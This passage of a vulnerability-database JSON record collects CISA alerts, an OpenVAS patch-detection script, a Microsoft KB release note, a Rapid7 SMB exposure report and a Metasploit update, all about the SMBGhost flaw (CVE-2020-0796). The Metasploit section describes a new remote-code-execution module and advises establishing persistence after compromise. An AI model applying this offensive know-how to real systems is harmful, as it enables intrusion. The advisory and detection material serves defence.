"acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-06-05T00:00:00", "id": "CISA:9D38592E642AD30FA4BC435AC4FFC304", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/06/05/unpatched-microsoft-systems-vulnerable-cve-2020-0796", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-11T11:32:58", "description": "CISA has added 15 new vulnerabilities to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.\n\n**CVE Number** | **CVE Title** | **Remediation Due Date** \n---|---|--- \n \nCVE-2021-36934\n\n| \n\nMicrosoft Windows SAM Local Privilege Escalation Vulnerability\n\n| \n\n2/24/2022 \n \nCVE-2020-0796\n\n| \n\nMicrosoft SMBv3 Remote Code Execution Vulnerability\n\n| \n\n8/10/2022 \n \nCVE-2018-1000861\n\n| \n\nJenkins Stapler Web Framework Deserialization of Untrusted Data Vulnerability\n\n| \n\n8/10/2022 \n \nCVE-2017-9791\n\n| \n\nApache Struts 1 Improper Input Validation Vulnerability\n\n| \n\n8/10/2022 \n \nCVE-2017-8464\n\n| \n\nMicrosoft Windows Shell (.lnk) Remote Code Execution Vulnerability\n\n| \n\n8/10/2022 \n \nCVE-2017-10271\n\n| \n\nOracle Corporation WebLogic Server Remote Code Execution Vulnerability\n\n| \n\n8/10/2022 \n \nCVE-2017-0263\n\n| \n\nMicrosoft Win32k Privilege Escalation Vulnerability\n\n| \n\n8/10/2022 \n \nCVE-2017-0262\n\n| \n\nMicrosoft Office Remote Code Execution Vulnerability\n\n| \n\n8/10/2022 \n \nCVE-2017-0145\n\n| \n\nMicrosoft SMBv1 Remote Code Execution Vulnerability\n\n| \n\n8/10/2022 \n \nCVE-2017-0144\n\n| \n\nMicrosoft SMBv1 Remote Code Execution Vulnerability\n\n| \n\n8/10/2022 \n \nCVE-2016-3088 \n\n| \n\nApache ActiveMQ Improper Input Validation Vulnerability\n\n| \n\n8/10/2022 \n \nCVE-2015-2051\n\n| \n\nD-Link DIR-645 Router Remote Code Execution\n\n| \n\n8/10/2022 \n \nCVE-2015-1635\n\n| \n\nMicrosoft HTTP.sys Remote Code Execution Vulnerability\n\n| \n\n8/10/2022 \n \nCVE-2015-1130\n\n| \n\nApple OS X Authentication Bypass Vulnerability\n\n| \n\n8/10/2022 \n \nCVE-2014-4404\n\n| \n\nApple OS X Heap-Based Buffer Overflow Vulnerability\n\n| \n\n8/10/2022 \n \n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://cisa.gov/sites/default/files/publications/Reducing_the_Significant_Risk_of_Known_Exploited_Vulnerabilities_211103.pdf>) for more information.\n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities>).\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/02/10/cisa-adds-15-known-exploited-vulnerabilities-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-10T00:00:00", "type": "cisa", "title": "CISA Adds 15 Known Exploited Vulnerabilities to Catalog", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4404", "CVE-2015-1130", "CVE-2015-1635", "CVE-2015-2051", "CVE-2016-3088", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-8464", "CVE-2017-9791", "CVE-2018-1000861", "CVE-2020-0796", "CVE-2021-36934"], "modified": "2022-02-10T00:00:00", "id": "CISA:5FE14EDE9F5E20EB9536DC356A82AAB6", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/02/10/cisa-adds-15-known-exploited-vulnerabilities-catalog", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-03-20T18:49:58", "description": "This host is missing a critical security\n update according to Microsoft KB4551762", "cvss3": {}, "published": "2020-03-12T00:00:00", "type": "openvas", "title": "Microsoft Windows Server Message Block 3.1.1 RCE Vulnerability (KB4551762)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-19T00:00:00", "id": "OPENVAS:1361412562310816800", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816800", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the rsleferenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816800\");\n script_version(\"2020-03-19T10:52:32+0000\");\n script_cve_id(\"CVE-2020-0796\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-19 10:52:32 +0000 (Thu, 19 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-03-12 13:00:37 +0000 (Thu, 12 Mar 2020)\");\n script_name(\"Microsoft Windows Server Message Block 3.1.1 RCE Vulnerability (KB4551762)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4551762\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The vulnerability is due to an error when the\n SMBv3 handles maliciously crafted compressed data packets. Both SMB Servers and\n clients are affected. To exploit the vulnerability against an SMB Server, an\n unauthenticated attacker could send a specially crafted packet to a targeted SMBv3\n Server. While as to exploit the vulnerability against an SMB Client, an\n unauthenticated attacker would need to configure a malicious SMBv3 Server and\n convince a user to connect to it.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute code on the target SMB Server or SMB Client.\");\n\n script_tag(name:\"affected\", value:\"SMB 3.1.1(SMBv3) on\n\n - Windows 10 Version 1903 for 32-bit/x64-based Systems\n\n - Windows 10 Version 1909 for 32-bit/x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-gb/help/4551762/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Gdiplus.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_in_range(version:fileVer, test_version:\"10.0.18362.0\", test_version2:\"10.0.18362.719\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Gdiplus.dll\",\n file_version:fileVer, vulnerable_range:\"10.0.18362.0 - 10.0.18362.719\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:39:08", "description": "A vulnerability exists in Windows. Successful exploitation of this vulnerability could allow a remote attacker to damage users system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-03-11T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows SMBv3 Remote Code Execution (CVE-2020-0796)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-06-30T00:00:00", "id": "CPAI-2020-0136", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mskb": [{"lastseen": "2022-08-24T11:29:07", "description": "None\n**NEW 8/5/21 \nEXPIRATION NOTICE****IMPORTANT **As of 8/5/2021, this KB is no longer available from Windows Update, the Microsoft Update Catalog, or other release channels. We recommend that you update your devices to the latest security quality update. \n\n**What's new for Windows 10, version 1909 and Windows 10, version 1903 release notes**Windows 10, versions 1903 and 1909 share a common core operating system and an identical set of system files. As a result, the new features in Windows 10, version 1909 were included in the recent monthly quality update for Windows 10, version 1903 (released October 8, 2019), but are currently in a dormant state. These new features will remain dormant until they are turned on using an _enablement package_, which is a small, quick-to-install \u201cmaster switch\u201d that simply activates the Windows 10, version 1909 features.To reflect this change, the release notes for Windows 10, version 1903 and Windows 10, version 1909 will share an update history page. Each release page will contain a list of addressed issues for both 1903 and 1909 versions. Note that the 1909 version will always contain the fixes for 1903; however, 1903 will not contain the fixes for 1909. This page will provide you with the build numbers for both 1909 and 1903 versions so that it will be easier for support to assist you if you encounter issues.For more details about the enablement package and how to get the feature update, see the [Windows 10, version 1909 delivery options](<https://aka.ms/1909mechanics>) blog.\n\nFor more information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following article.**Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard.\n\n## Highlights\n\n * Updates a Microsoft Server Message Block 3.1.1 protocol issue that provides shared access to files and printers.\n\n## Improvements and fixes\n\n## \n\n__\n\nWindows 10, version 1909\n\nThis security update includes quality improvements. Key changes include:\n\n * * This build includes all the improvements from Windows 10, version 1903.\n * No additional issues were documented for this release.\n\n## \n\n__\n\nWindows 10, version 1903\n\nThis security update includes quality improvements. Key changes include:\n\n * Security update to the Microsoft Server Message Block 3.1.1 (SMBv3).\n\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\nKnown issues in this update**Symptom**| **Workaround** \n---|--- \nWhen using Windows Server containers with the March 10, 2020 updates, you might encounter issues with 32-bit applications and processes.| For important guidance on updating Windows containers, please see [Windows container version compatibility](<https://docs.microsoft.com/en-us/virtualization/windowscontainers/deploy-containers/version-compatibility?tabs=windows-server-1909%2Cwindows-10-1909>) and [Update Windows Server containers](<https://docs.microsoft.com/en-us/virtualization/windowscontainers/deploy-containers/update-containers>). \nDevices using a manual or auto-configured proxy, especially with a virtual private network (VPN), might show limited or no internet connection status in the Network Connectivity Status Indicator (NCSI) in the notification area. This might happen when connected to or disconnected from a VPN or after changing the state between the two. Devices with this issue might also have issues reaching the internet using applications that use WinHTTP or WinInet. Examples of apps that might be affected on devices in this state include, but are not limited to, Microsoft Teams, Microsoft Office, Microsoft Office 365, Microsoft Outlook, Internet Explorer 11, and some versions of Microsoft Edge.| This issue is resolved in KB4554364. \nDevices on a domain might be unable to install apps published using a Group Policy Object (GPO). This issue only affects app installations that use .msi files. It does not affect any other installation methods, such as from the Microsoft Store.| This issue is resolved in KB4549951. \nAfter installing this update on a Windows 10 device with a wireless wide area network (WWAN) LTE modem, reaching the internet might not be possible. However, the Network Connectivity Status Indicator (NCSI) in the notification area might still indicate that you are connected to the internet.| This issue is resolved in KB4559004. \nHow to get this update**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB4541338) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4551762>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10, version 1903 and later**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 4551762](<https://download.microsoft.com/download/f/7/9/f791a285-889c-4167-8f50-7f8f1aecdf33/4551762.csv>). **Note** Some files erroneously have \u201cNot applicable\u201d in the \u201cFile version\u201d column of the CSV file. This might lead to false positives or false negatives when using some third-party scan detection tools to validate the build.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-12T07:00:00", "type": "mskb", "title": "March 12, 2020\u2014KB4551762 (OS Builds 18362.720 and 18363.720) - EXPIRED", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-12T07:00:00", "id": "KB4551762", "href": "https://support.microsoft.com/en-us/help/4551762", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2020-09-29T08:39:07", "description": "![NICER Protocol Deep Dive: Internet Exposure of SMB](https://blog.rapid7.com/content/images/2020/09/NICER-Protocol-Deep-Dive--Internet-Exposure-of-SMB2.jpg)\n\nWelcome to the NICER Protocol Deep Dive blog series! When we started researching what all was out on the internet way back in January, we had no idea we'd end up with a hefty, 137-page tome of a research report. The sheer length of such a thing might put off folks who might otherwise learn a thing or two about the nature of internet exposure, so we figured, why not break up all the protocol studies into their own reports?\n\nSo, here we are! What follows is taken directly from our National / Industry / Cloud Exposure Report (NICER), so if you don't want to wait around for the next installment, you can cheat and read ahead!\n\n#### [Research] Read the full NICER report today\n\n[Get Started](<https://www.rapid7.com/info/nicer-2020/>)\n\n \n\n\n## SMB (TCP/445)\n\n_Choosy worms choose SMB._\n\n#### TLDR\n\n**WHAT IT IS: **SMB is the Windows everything protocol, but is usually used for Windows-based file transfers.\n\n**HOW MANY:** 593,749 discovered nodes\n\n**VULNERABILITIES: **The most destructive internet worms in history use SMB in some way.\n\n**ADVICE: **Direct access to SMB outside of an unroutable, local network should be prohibited as a general rule.\n\n**ALTERNATIVES:** HTTPS-based file sharing is usually the answer for whatever file hosting SMB was intending, but most SMB exposures seem to be accidental.\n\n**GETTING:** Better! ZOMGOSH! Thanks mostly to ISPs, there was a 16% decrease in exposure from 2019.\n\n### SMB discovery details\n\nSMB is a continued source of heartache and headaches for network operators the world over. Originally designed to operate on local area network protocols like NetBEUI and IPX/SPX, SMBv1 was ported to the regular TCP/IP network that the rest of the internet runs on. Since then, SMBv2 and SMBv3 have been released. While SMB is primarily associated with Windows-based computers for authentication, file sharing, print services, and process control, SMB is also maintained for non-Windows operating systems in implementations such as Samba and Netsmb. As a binary protocol with negotiable encryption capabilities, it is a complex protocol. This complexity, along with its initial proprietary nature and deep couplings with the operating system kernel, makes it an ideal field for discovering security vulnerabilities that can enable remote code execution (RCE). On top of this, the global popularity of Windows as a desktop operating system ensures it remains a popular target for bug hunters and exploiters alike.\n\n![NICER Protocol Deep Dive: Internet Exposure of SMB](https://blog.rapid7.com/content/images/2020/09/smb-1.png)![NICER Protocol Deep Dive: Internet Exposure of SMB](https://blog.rapid7.com/content/images/2020/09/smb-2.png)\n\n### Exposure information\n\nMany of the most famous vulnerabilities, exploits, and in-the-wild worms have leveraged SMB in some way. [WannaCry](<https://blog.rapid7.com/2019/05/13/wannacry-two-years-on-current-threat-landscape-forgotten-lessons-and-hope-for-the-future/https://blog.rapid7.com/2019/05/13/wannacry-two-years-on-current-threat-landscape-forgotten-lessons-and-hope-for-the-future/>) and [NotPetya](<https://www.rapid7.com/security-response/petya/>) are two of the most recent events that centered on SMB, both for exploitation and for transmission. Prior SMB-based attacks include the Nachi and Blaster worms (2003\u20132005), and future SMB-based attacks will likely include [SMBGhost](<https://attackerkb.com/topics/2LCXe3EPAZ/cve-2020-0796---smbghost>). In addition to bugs, intended features of SMB\u2014notably, automatic hash-passing\u2014make it an ideal mechanism to steal password hashes from unsuspecting victims, and SMB shares (network-exposed directories of files) continue to be accidentally exposed to the internet via server mismanagement and too-easy-to-use network-attached storage (NAS) devices.\n\nAs expected, the preponderance of SMB services available on the internet are Windows-based, but the table below shows there is also a sizable minority of non-Windows SMB available.\n\nSMB Server Kind | Count \n---|--- \nWindows (Server) | 298,296 \nLinux/Unix/BSD/SunOS (Samba) | 170,095 \nWindows (Desktop) | 110,340 \nQNAP NAS Device | 10,164 \nOther/Honeypot | 1,914 \nApple Time Capsule or macOS | 1,465 \nWindows (Embedded) | 703 \nKeenetic NAS | 647 \nPrinter | 386 \nZyxel NAS | 6 \nEMC NAS | 5 \n \nAs you can see, these non-Windows nodes are typically some type of NAS system used in otherwise largely Windows environments, and are responsible for maintaining nearline backup systems. While these devices are unlikely to be vulnerable to exactly the same exploits that dog Windows systems, the mere fact that these **backups are exposed to the internet** means that, eventually, these network operators are Going To Have A Bad Time if and when they get hit by the next wave of ransomware attacks.\n\n### Unattended installs\n\nOf the Windows machines exposed to the internet, we can learn a little about their provenance from the Workgroup strings that we're able to see from [Sonar scanning](<https://www.rapid7.com/research/project-sonar/>). The list below indicates that the vast majority of these machines are using the default WORKGROUP workgroup, with others being automatically generated as part of a standard, unattended installation. In a magical world where SMB is both rare and safe to expose to the internet, we would expect those machines to be manually configured and routinely patched.\n\nThis is not the case, though\u2014these Windows operating systems were very likely installed and configured automatically, with no special care given to their exposed-to-the-internet status, so the exposure is almost certainly accidental and not serving some special, critical business function. Additionally, these aftermarket-default WORKGROUPS are also giving away hints about which specific Windows- or Samba-based build is being used in production environments, and can give attackers ideas about targeting those systems.\n\nWorkgroup | Count \n---|--- \n`WORKGROUP` | 204,014 \n`WIN-<string e.g. 4RGO6K0U19F>` | 98,153 \n`MICROSO-<string e.g. HCBD8KK>` | 27,213 \n`SERVER[####]` | 15,721 \n`HK-<number e.g. 2723>` | 12,823 \nIP Address | 10,367 \n`DESKTOP-<string e.g. HUDL8UO>` | 7,203 \n`HKSRV[####]` | 6,160 \n`RS-<string e.g. A2-084` | 6,017 \n`XR-<string e.g. 20190714REWT>` | 4,448 \n`QNSERVER[####]` | 4,067 \n`PC-<string e.g. HCBD8KK>` | 4,034 \n`CCSERVER[####]` | 3,807 \n`SVR-<number e.g. 20191106VUM>` | 3,303 \n`MYGROUP` | 3,269 \n`MSHOME` | 3,060 \n`SRV*` | 2,910 \n`SERVER` | 2,476 \n`VM*` | 2,186 \n`TKO[####]` | 2,088 \n \n### Attacker\u2019s view\n\nRegardless of the version and configuration of cryptographic and other security controls, SMB is inappropriate for today's internet. It is too complex to secure reliably, and critical vulnerabilities that are attractive to criminal exploitation continue to surface in the protocol. With that said, SMB continues to be a critical networking layer in office environments of any size, and since it\u2019s native to TCP/IP, network misconfigurations can inadvertently expose SMB-based resources directly to the internet. **Every organization should be continually testing its network ingress and egress filters for SMB traffic**\u2014not only to prevent outsiders from sending SMB traffic to your accidentally exposed resources, but to prevent internal users from accidentally leaking SMB authentication traffic out into the world.\n\nApproximately 640,000 unique IP addresses visited our high-interaction SMB honeypots over the measured period, but rather than think of this as a horde of SMB criminals, we should recall that the vast majority of those connections are from machines on the internet that were, themselves, compromised. After all, that's how worms work. Very few of these connections were likely sourced from an attacker's personally owned (rather than pwned) machine. With this in mind, our honeypot traffic gives us a pretty good idea of which countries are, today, most exposed to the next SMB-based mega-worm like WannaCry: Vietnam, Russia, Indonesia, Brazil, and India are all at the top of this list.\n\n![NICER Protocol Deep Dive: Internet Exposure of SMB](https://blog.rapid7.com/content/images/2020/09/smb-3.png)\n\nAmong the cloud providers, things are more stark. EternalBlue, the exploit underpinning WannaCry, was responsible for about 1.5 million connections to our honeypots from Digital Ocean, while Microsoft Azure was the source of about 8 million (non-EternalBlue) connections (of which, about 15%, or 1.2 million or so, were accidental connections due to a misconfiguration at Azure). We're not yet sure why this wild discrepancy in attack traffic versus accidental traffic exists between Digital Ocean and Azure, but we suspect that Microsoft is much more aggressive about making sure the default offerings at Azure are patched against MS17-010, while Digital Ocean appears to be more hands-off about patch enforcement, leaving routine maintenance to its user base.\n\n![NICER Protocol Deep Dive: Internet Exposure of SMB](https://blog.rapid7.com/content/images/2020/09/smb-4.png)\n\n### Our advice\n\n**IT and IT security teams** should prohibit SMB access to, or from, their organization over anything but VPN-connected networks, and regularly scan their known, externally facing IP address space for misconfigured SMB servers. \n\n**Cloud providers** should prohibit SMB access to cloud resources, and at the very least, routinely scrutinize SMB access to outside resources. Given that approximately 15% of our inbound honeypot connections over SMB from Microsoft Azure are actually misconfigurations, rather than attacks or research probes, Azure should be especially aware of this common flaw and make it difficult to impossible to accidentally expose SMB at the levels that are evident today.\n\n**Government cybersecurity agencies **should be acutely aware of their own national exposure to SMB, and institute routine scanning and notification programs to shut down SMB access wherever it surfaces. This is especially true for those countries that are at the top of our honeypot source list.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {}, "published": "2020-09-18T15:11:21", "type": "rapid7blog", "title": "NICER Protocol Deep Dive: Internet Exposure of SMB", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2020-09-18T15:11:21", "id": "RAPID7BLOG:614648646663CF660156AD39ED9421B3", "href": "https://blog.rapid7.com/2020/09/18/nicer-protocol-deep-dive-internet-exposure-of-smb/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-05-28T16:58:28", "description": "## RCE Exploit For CVE-2020-0796 (SMBGhost)\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2021/05/metasploit-blg-2-small-1-3.png)\n\nThis week our very own Spencer McIntyre has added an exploit for [CVE-2020-0796](<https://attackerkb.com/topics/2LCXe3EPAZ/cve-2020-0796---smbghost?referrer=blog>), which leverages a vulnerability within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol to gain unauthenticated remote code execution against unpatched Windows 10 v1903 and v1909 systems. Previously, Metasploit offered an LPE version of this exploit but not RCE support. The exploit is heavily based on the [chompie1337/SMBGhost_RCE_PoC PoC](<https://github.com/chompie1337/SMBGhost_RCE_PoC>).\n\nNote that there is a high probability that, even when the exploit is successful, the remote target will crash within about 90 minutes. It is recommended that after a successful compromise, a persistence mechanism be established and the system be rebooted to avoid a Blue Screen of Death (BSOD).\n\n## Improved command history management\n\nCommunity member [pingport80](<https://github.com/pingport80>) has made improvements to Metasploit's command history management to now be context aware. The command history for both the main console and sub-shells, such as Pry and Metepreter, will now have their command history separated. This means that pressing the up arrow key within the console in these different contexts will now only show the command history for that specific context sub-shell, which should be more intuitive to users.\n\n## New module content (2)\n\n * [SMBv3 Compression Buffer Overflow](<https://github.com/rapid7/metasploit-framework/pull/15024>) by Spencer McIntyre, chompie1337, and hugeh0ge, which exploits [CVE-2020-0796](<https://attackerkb.com/topics/2LCXe3EPAZ/cve-2020-0796---smbghost?referrer=blog>) \\- This adds an exploit for CVE-2020-0796 which can be used to gain unauthenticated remote code execution against unpatched Windows 10 v1903 and v1909 systems.\n * [Git Ignore Retriever](<https://github.com/rapid7/metasploit-framework/pull/14984>) by N!ght Jmp - Adds an OSX Post exploitation module to retrieve `.gitignore` files that may contain pointers to files of interest\n\n## Enhancements and features\n\n * [#15062](<https://github.com/rapid7/metasploit-framework/pull/15062>) from [pingport80](<https://github.com/pingport80>) \\- Adds support for separating command history for the various sub-shells such as Meterpreter and Pry\n * [#15079](<https://github.com/rapid7/metasploit-framework/pull/15079>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This introduces the `meterpreter` key to the `compat` hash to better-provide Meterpreter session compatibility info to users, including printing the required Meterpreter extension(s) to the console in the event of a session incompatibility. Additionally, `post` modules will automatically load Meterpreter extensions used, provided that the module's Meterpreter compatibility requirements are annotated.\n * [#15199](<https://github.com/rapid7/metasploit-framework/pull/15199>) from [pingport80](<https://github.com/pingport80>) \\- This improves the `get_processes` API on non-Windows systems with support that fails back to enumerating the `/proc` directory when the `ps` utility is not present.\n * [#15220](<https://github.com/rapid7/metasploit-framework/pull/15220>) from [bogey3](<https://github.com/bogey3>) \\- This modification adds the ability to retrieve the OS version from \nan NTLMSSP type 2 message.\n * [#15242](<https://github.com/rapid7/metasploit-framework/pull/15242>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This updates the tables displayed by the `loot` command to be displayed without wrapping. This makes it easier for users to copy and paste the output.\n * [#15243](<https://github.com/rapid7/metasploit-framework/pull/15243>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Adds a check method to the Apache Tomcat Ghostcat module\n * [#15246](<https://github.com/rapid7/metasploit-framework/pull/15246>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- This refactors some common functionality into a cross-platform `Msf::Post::Process` mixin with support for multiple session types.\n\n## Bugs fixed\n\n * [#15216](<https://github.com/rapid7/metasploit-framework/pull/15216>) from 